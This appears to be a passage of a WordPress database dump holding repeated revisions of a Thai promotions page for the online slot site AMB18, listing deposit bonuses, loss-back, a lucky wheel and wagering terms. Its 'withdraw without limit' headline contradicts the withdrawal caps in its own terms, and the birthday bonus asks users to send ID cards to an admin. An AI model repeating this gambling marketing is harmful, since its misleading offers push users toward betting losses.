https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>วิธีการรับโปรโมชั่น</h2> <ul><li data-start=\"2531\" data-end=\"2570\">เข้าสู่ระบบ → ไปที่เมนู <strong data-start=\"2555\" data-end=\"2568\">โปรโมชั่น</strong></li><li data-start=\"2574\" data-end=\"2643\">เลือกโปรที่ต้องการ และกด <strong data-start=\"2599\" data-end=\"2614\">กดรับสิทธิ์</strong> (หรือแจ้งแอดมินตามที่ระบุ)</li><li data-start=\"2647\" data-end=\"2706\">ระบบเครดิตเข้า <strong data-start=\"2662\" data-end=\"2675\">อัตโนมัติ</strong> / หรือหลังยืนยันสิทธิ์สำเร็จ</li><li data-start=\"2710\" data-end=\"2741\">ตรวจสอบสถานะได้ในประวัติธุรกรรม</li></ul> <h2>เงื่อนไข</h2> <ul><li data-start=\"2092\" data-end=\"2176\">โปรทั้งหมดสำหรับ <strong data-start=\"2109\" data-end=\"2138\">1 ผู้ใช้/1 อุปกรณ์/1 ไอพี</strong> ห้ามใช้หลายบัญชีหรือทุจริตทุกรูปแบบ</li><li data-start=\"2179\" data-end=\"2301\">การนับเทิร์นและการถอน <strong data-start=\"2201\" data-end=\"2237\">เป็นไปตามระบบอัตโนมัติของ </strong><b>AMB18 </b>เฉพาะหมวดสล็อต (หากมีหมวดที่ไม่นับเทิร์น ระบบจะแจ้งในหน้าเกม)</li><li data-start=\"2304\" data-end=\"2404\">เมื่อกดรับโปรใดโปรหนึ่ง ถือว่ายอมรับเงื่อนไขของโปรนั้น ๆ และ <strong data-start=\"2365\" data-end=\"2385\">ไม่สามารถซ้อนโปร</strong> ยกเว้นที่ระบุไว้</li><li data-start=\"2407\" data-end=\"2499\"><b>AMB18 ขอสงวนสิทธิ์ปรับปรุง/ยกเลิก</b> โปรโมชั่น และปฏิเสธการจ่ายหากตรวจพบทุจริต/ผิดเงื่อนไข</li></ul>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2026-02-26 19:24:50','2026-02-26 19:24:50','',27,'https://amb18slot.com/?p=405',0,'revision','',0),(406,3,'2026-02-26 19:25:55','2026-02-26 19:25:55','<h1>โปรโมชั่น AMB18 รวมโปรสล็อต สมัครรับโบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-pm-slice=\"0 0 []\">โปรโมชั่นตัวตึงจาก AMB18 จัดเต็มเพื่อสายสล็อตตัวจริงกับโปรสมัครใหม่รับโบนัสฟรี 100% เพิ่มพลังให้สนุกได้ตั้งแต่ก้าวแรกเติมไม่ต้องหนักก็มีสิทธิ์ลุ้นมันส์ได้เหมือนกัน แถมเงื่อนไขถอนไม่อั้น เล่นได้แบบไม่ต้องกั๊กรองรับครบทั้งสมาชิกใหม่และสมาชิกปัจจุบันใครอยู่ทีมไหนก็เข้าร่วมได้หมดรวมโปรสล็อตมาให้แบบจุก ๆ ทั้งโบนัสฝากครั้งแรก โบนัสฝากประจำ โปรคืนยอดเสีย และกิจกรรมพิเศษตามเทศกาลที่สลับมาให้ร่วมสนุกตลอดปีอัปเดตใหม่เรื่อย ๆ ไม่มีเอาต์ ช่วยให้ทุกยอดเดิมพันดูคุ้มขึ้นแบบเห็นชัด เรื่องระบบก็หายห่วงเพราะฝากถอนอัตโนมัติทำรายการไวแบบไม่ต้องรอนาน ปลอดภัย มั่นใจได้ รองรับธนาคารชั้นนำ ใช้งานง่ายบนออนไลน์ ตอบโจทย์สายเอ็นเตอร์เทนที่อยากได้ทั้งความตื่นเต้นและความสะดวกในที่เดียว แต่ถึงโปรจะปังแค่ไหนก็อย่าลืมเล่นแบบมีสติวางแผนการเงินทุกครั้งก่อนเริ่มเดิมพัน และเปิดให้บริการสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้น เพื่อให้ความสนุกมาคู่กับความรับผิดชอบและความปลอดภัยแบบจริงจัง</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789.webp\" alt=\"20 get 100\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789.webp\" alt=\"79 get 200\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789.webp\" alt=\"Bonus free 100\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789.webp\" alt=\"HBD Bonus\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789.webp\" alt=\"Reward 10\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789.webp\" alt=\"lucky wheel\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>วิธีการรับโปรโมชั่น</h2> <ul><li data-start=\"2531\" data-end=\"2570\">เข้าสู่ระบบ → ไปที่เมนู <strong data-start=\"2555\" data-end=\"2568\">โปรโมชั่น</strong></li><li data-start=\"2574\" data-end=\"2643\">เลือกโปรที่ต้องการ และกด <strong data-start=\"2599\" data-end=\"2614\">กดรับสิทธิ์</strong> (หรือแจ้งแอดมินตามที่ระบุ)</li><li data-start=\"2647\" data-end=\"2706\">ระบบเครดิตเข้า <strong data-start=\"2662\" data-end=\"2675\">อัตโนมัติ</strong> / หรือหลังยืนยันสิทธิ์สำเร็จ</li><li data-start=\"2710\" data-end=\"2741\">ตรวจสอบสถานะได้ในประวัติธุรกรรม</li></ul> <h2>เงื่อนไข</h2> <ul><li data-start=\"2092\" data-end=\"2176\">โปรทั้งหมดสำหรับ <strong data-start=\"2109\" data-end=\"2138\">1 ผู้ใช้/1 อุปกรณ์/1 ไอพี</strong> ห้ามใช้หลายบัญชีหรือทุจริตทุกรูปแบบ</li><li data-start=\"2179\" data-end=\"2301\">การนับเทิร์นและการถอน <strong data-start=\"2201\" data-end=\"2237\">เป็นไปตามระบบอัตโนมัติของ </strong><b>AMB18 </b>เฉพาะหมวดสล็อต (หากมีหมวดที่ไม่นับเทิร์น ระบบจะแจ้งในหน้าเกม)</li><li data-start=\"2304\" data-end=\"2404\">เมื่อกดรับโปรใดโปรหนึ่ง ถือว่ายอมรับเงื่อนไขของโปรนั้น ๆ และ <strong data-start=\"2365\" data-end=\"2385\">ไม่สามารถซ้อนโปร</strong> ยกเว้นที่ระบุไว้</li><li data-start=\"2407\" data-end=\"2499\"><b>AMB18 ขอสงวนสิทธิ์ปรับปรุง/ยกเลิก</b> โปรโมชั่น และปฏิเสธการจ่ายหากตรวจพบทุจริต/ผิดเงื่อนไข</li></ul>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2026-02-26 19:25:55','2026-02-26 19:25:55','',27,'https://amb18slot.com/?p=406',0,'revision','',0),(407,3,'2026-02-26 19:25:56','2026-02-26 19:25:56','<h1>โปรโมชั่น AMB18 รวมโปรสล็อต สมัครรับโบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-pm-slice=\"0 0 []\">โปรโมชั่นตัวตึงจาก AMB18 จัดเต็มเพื่อสายสล็อตตัวจริงกับโปรสมัครใหม่รับโบนัสฟรี 100% เพิ่มพลังให้สนุกได้ตั้งแต่ก้าวแรกเติมไม่ต้องหนักก็มีสิทธิ์ลุ้นมันส์ได้เหมือนกัน แถมเงื่อนไขถอนไม่อั้น เล่นได้แบบไม่ต้องกั๊กรองรับครบทั้งสมาชิกใหม่และสมาชิกปัจจุบันใครอยู่ทีมไหนก็เข้าร่วมได้หมดรวมโปรสล็อตมาให้แบบจุก ๆ ทั้งโบนัสฝากครั้งแรก โบนัสฝากประจำ โปรคืนยอดเสีย และกิจกรรมพิเศษตามเทศกาลที่สลับมาให้ร่วมสนุกตลอดปีอัปเดตใหม่เรื่อย ๆ ไม่มีเอาต์ ช่วยให้ทุกยอดเดิมพันดูคุ้มขึ้นแบบเห็นชัด เรื่องระบบก็หายห่วงเพราะฝากถอนอัตโนมัติทำรายการไวแบบไม่ต้องรอนาน ปลอดภัย มั่นใจได้ รองรับธนาคารชั้นนำ ใช้งานง่ายบนออนไลน์ ตอบโจทย์สายเอ็นเตอร์เทนที่อยากได้ทั้งความตื่นเต้นและความสะดวกในที่เดียว แต่ถึงโปรจะปังแค่ไหนก็อย่าลืมเล่นแบบมีสติวางแผนการเงินทุกครั้งก่อนเริ่มเดิมพัน และเปิดให้บริการสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้น เพื่อให้ความสนุกมาคู่กับความรับผิดชอบและความปลอดภัยแบบจริงจัง</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789.webp\" alt=\"20 get 100\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789.webp\" alt=\"79 get 200\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789.webp\" alt=\"Bonus free 100\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" 